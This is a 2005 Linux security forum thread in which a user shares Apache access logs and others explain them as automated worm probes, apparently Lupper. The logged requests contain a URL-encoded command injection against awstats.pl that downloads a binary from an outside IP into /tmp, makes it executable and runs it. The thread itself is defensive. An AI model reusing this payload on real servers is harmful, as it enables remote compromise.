LinuxQuestions.org
Welcome to the most active Linux Forum on the web.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Security
User Name
Password
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Notices


Reply
  Search this Thread
Old 11-17-2005, 02:14 PM   #1
simcox1
Member
 
Registered: Mar 2005
Location: UK
Distribution: Slackware
Posts: 794
Blog Entries: 2

Rep: Reputation: 30
are these logs weird?


I've noticed some very strange logs in my apache_log file. When it says chmod I feel a bit worried. This is a sample.

220.194.61.230 - - [17/Nov/2005:10:53:33 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2 bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 302
220.194.61.230 - - [17/Nov/2005:10:53:35 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2 bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 302
220.194.61.230 - - [17/Nov/2005:10:53:36 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2 bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 310
220.194.61.230 - - [17/Nov/2005:10:53:38 +0000] "POST /xmlrpc.php HTTP/1.1" 404 294
220.194.61.230 - - [17/Nov/2005:10:53:40 +0000] "POST /blog/xmlrpc.php HTTP/1.1" 404 299
220.194.61.230 - - [17/Nov/2005:10:53:41 +0000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 306
220.194.61.230 - - [17/Nov/2005:10:53:43 +0000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 307
220.194.61.230 - - [17/Nov/2005:10:53:44 +0000] "POST /drupal/xmlrpc.php HTTP/1.1" 404 301
220.194.61.230 - - [17/Nov/2005:10:53:45 +0000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 307
220.194.61.230 - - [17/Nov/2005:10:53:47 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 304
220.194.61.230 - - [17/Nov/2005:10:53:48 +0000] "POST /xmlrpc.php HTTP/1.1" 404 294
220.194.61.230 - - [17/Nov/2005:10:53:50 +0000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 301
220.194.61.230 - - [17/Nov/2005:10:53:51 +0000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 301
client-82-2-80-26.manc.adsl.virgin.net - - [17/Nov/2005:13:31:28 +0000] "GET / HTTP/1.0" 200 1683
www.nomura-system.co.jp - - [17/Nov/2005:15:15:37 +0000] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2 bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 302
www.nomura-system.co.jp - - [17/Nov/2005:15:15:38 +0000] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2 bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 302
www.nomura-system.co.jp - - [17/Nov/2005:15:15:40 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2 bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 310
www.nomura-system.co.jp - - [17/Nov/2005:15:15:44 +0000] "POST /xmlrpc.php HTTP/1.1" 404 294
www.nomura-system.co.jp - - [17/Nov/2005:15:15:45 +0000] "POST /blog/xmlrpc.php HTTP/1.1" 404 299
www.nomura-system.co.jp - - [17/Nov/2005:15:15:47 +0000] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 404 306
www.nomura-system.co.jp - - [17/Nov/2005:15:15:48 +0000] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 404 307
www.nomura-system.co.jp - - [17/Nov/2005:15:15:49 +0000] "POST /drupal/xmlrpc.php HTTP/1.1" 404 301
www.nomura-system.co.jp - - [17/Nov/2005:15:15:53 +0000] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 404 307
www.nomura-system.co.jp - - [17/Nov/2005:15:15:55 +0000] "POST /wordpress/xmlrpc.php HTTP/1.1" 404 304
www.nomura-system.co.jp - - [17/Nov/2005:15:15:56 +0000] "POST /xmlrpc.php HTTP/1.1" 404 294
www.nomura-system.co.jp - - [17/Nov/2005:15:15:57 +0000] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 404 301
www.nomura-system.co.jp - - [17/Nov/2005:15:15:59 +0000] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 301
antispam3.test.mail.sc5.yahoo.com - - [17/Nov/2005:17:06:42 +0000] "GET / HTTP/1.0" 200 1683


Is this anything I need to worry about?
 
Old 11-17-2005, 02:51 PM   #2
ricstirato
Member
 
Registered: Jan 2004
Location: Gießen, Germany
Distribution: Xubuntu 12.04, Mythbuntu, Ubuntu Server 12.04
Posts: 174

Rep: Reputation: 24
These requests are simply trying to find known security holes in web applications.
As long as you don't have these installed, there's no reason to worry.

Such "attacks" are quite common. You might also find lots of login attempts using common usernames (root, bin, webmaster, ...) in your /var/log/secure (or /var/log/auth.log, depending on distro).

The 404 codes (meaning "not found") show that you don't have any of these apps running.
The chmod has been given as a parameter to the (probably vulnerable) awstats.pl script, which you don't seem to have.

If you ever get a non 4xx code, you may start worrying.

Regards
ric.

Last edited by ricstirato; 11-17-2005 at 02:55 PM.
 
Old 11-17-2005, 03:01 PM   #3
Finlay
Senior Member
 
Registered: Mar 2003
Location: Seattle
Distribution: Slackware ?-14.1
Posts: 1,029

Rep: Reputation: 47
as long as your webserver is running as nobody/nobody
and you don't have any scripts set to world RWX then you are fine, even if you happen to have awstats installed.
 
Old 11-17-2005, 03:27 PM   #4
simcox1
Member
 
Registered: Mar 2005
Location: UK
Distribution: Slackware
Posts: 794

Original Poster
Blog Entries: 2

Rep: Reputation: 30
Yes, I read the security warning at the top of the forum which seemed to relate to awstats and thought it might be that. I did have awstats installed but don't at the moment. I noticed the attempts were failing, but it's being quite persistent. Is it worth trying to block specific domains or ip's? Nothing to worry about at the moment anyway.
 
Old 11-17-2005, 03:29 PM   #5
Finlay
Senior Member
 
Registered: Mar 2003
Location: Seattle
Distribution: Slackware ?-14.1
Posts: 1,029

Rep: Reputation: 47
you can block domains or subnets if you want, but from experience with my log files, you will be adding 1 or 2 a day forever.
 
Old 11-17-2005, 04:32 PM   #6
ricstirato
Member
 
Registered: Jan 2004
Location: Gießen, Germany
Distribution: Xubuntu 12.04, Mythbuntu, Ubuntu Server 12.04
Posts: 174

Rep: Reputation: 24
Full ack to Finlay. Blocking domains would be a never ending work. Worst case you might block normal visitors that come from these domains or address ranges.

Just make sure you have enough free space for log files ;-)

Regards
ric.
 
Old 11-29-2005, 01:22 PM   #7
hal_2001
LQ Newbie
 
Registered: Oct 2003
Location: UK
Distribution: Mandriva, Red Hat, Fedora Core, MontaVista
Posts: 23

Rep: Reputation: 16
This is the Linux Lupper worm...
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
Weird MAC address in logs tangle Linux - Security 6 06-30-2005 05:54 PM
httpd weird logs dominant Linux - Security 3 02-08-2005 05:42 AM
apache logs, seeing weird things sal_paradise42 Linux - Networking 3 01-09-2004 04:45 PM
Weird Logs: Am I being hacked? KingofBLASH Linux - Security 1 09-29-2003 02:38 PM
Weird Logs: Am I being hacked? KingofBLASH Slackware 2 09-29-2003 01:31 PM

LinuxQuestions.org > Forums > Linux Forums > Linux - Security

All times are GMT -5. The time now is 07:20 PM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration